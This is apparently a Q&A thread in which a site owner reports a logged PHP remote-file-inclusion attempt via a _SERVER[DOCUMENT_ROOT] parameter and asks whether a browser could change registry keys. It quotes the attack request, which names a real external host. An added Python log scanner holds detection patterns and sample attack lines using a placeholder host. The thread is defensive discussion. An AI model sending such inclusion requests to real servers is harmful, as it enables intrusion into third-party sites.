
So I was browsing through my website access logs recently, and noticed several attempts to do things like this

?page=pics//?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr//skin_shop/.../cms/idf.txt??

Of course, I'm not completely stupid and this had no effect on my server or the software, but I thought for the hell of it, I'd see what's actually on that domain. When it loaded, Chrome attempted to change a registry key according to Comodo. Is there any way to actually change a registry key from code that a browser runs, or was it an unusual coincidence that Chrome, for the first time I've seen, tried to change a registry key?

Edit: 4 attempts at modification were made of different keys in HKLM/SYSTEM/ControlSet001/Services/ESENT

Jeff Atwood
Alex S

3 Answers

1

I'd say it was a coincidence, although clever security holes cannot be ruled out either. It might help if you told us what the registry key was.

OK, I see your edit. (And why did Jeff change the registry key?) Let me rephrase - can we find out which exact registry keys they were and what exact values did it want to set?

Anyway, ESENT turns out to be some built-in database engine in Windows.

Now, it is possible that the webpage used some security hole in Chrome and through it attempted to hijack ESENT to gain full control of the system. Sounds fairly logical.

It is also possible that Chrome (or some plugin of it - say a video player) used ESENT in a legitimate way, and it was ESENT itself that wanted to change some of its registry keys.

Vilx-
0

The _SERVER[DOCUMENT_ROOT] makes me think it's trying to change what PHP believes the webserver's document root is in order to execute the PHP in the linked file. I wasn't aware you could do this, but maybe there's an exploit in some specific version of PHP?

Is it possible that Chrome modifies registry keys with or without visiting the URL, and that it's completely unrelated?

Collin Allen
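One way to spot requests like the one in the question in an access log, as an added example (not code from the question or any answer; the log lines and hostnames below are constructed placeholders): flag query strings that name a PHP superglobal or carry a URL as a parameter value, the two things the logged request combines.

```python
import re
from urllib.parse import unquote, urlsplit

# "combined" log format prefix: client ip, identity, user, [timestamp], "request line", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# A PHP superglobal used as a query-parameter name: only meaningful to an app
# that (under register_globals or a careless extract()) lets clients overwrite it.
SUPERGLOBAL_RE = re.compile(
    r'(?:^|[?&;])(?:_SERVER|_GET|_POST|_COOKIE|_REQUEST|_FILES|_ENV|_SESSION|GLOBALS)\s*\[', re.I)
# A parameter value that is itself a URL: the classic remote file inclusion shape.
REMOTE_URL_RE = re.compile(r'=\s*/*(?:https?|ftp|php|data):', re.I)

INDICATORS = (
    ("php-superglobal-injection", SUPERGLOBAL_RE),
    ("remote-file-inclusion", REMOTE_URL_RE),
)

def classify_target(target):
    """Return the sorted list of indicator names that match a request target."""
    query = unquote(urlsplit(target).query)   # decode %xx so encoded payloads are not missed
    return sorted(name for name, rx in INDICATORS if rx.search(query))

def scan_log(lines):
    """Return (ip, target, indicators) for every line that trips at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue                            # skip lines that are not in combined format
        reasons = classify_target(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits

# Constructed sample lines; attacker.example is a placeholder, not a real host.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2009:13:55:36 +0000] "GET /index.php?page=pics HTTP/1.1" 200 5123',
    '198.51.100.7 - - [10/Oct/2009:13:55:40 +0000] "GET /index.php?page=pics//?_SERVER[DOCUMENT_ROOT]=http://attacker.example//cms/idf.txt?? HTTP/1.1" 200 5123',
    '198.51.100.7 - - [10/Oct/2009:13:55:41 +0000] "GET /index.php?page=http%3A%2F%2Fattacker.example%2Fshell.txt HTTP/1.1" 404 231',
    'garbage line that is not a log entry',
]

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, ",".join(reasons), target)
```

A hit only means the request was attempted; whether it did anything depends on the application, as the question's author notes for their own server.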
0

Chrome has built-in storage (Google Gears). Is it possible that it's trying to store its local database in the registry?

semi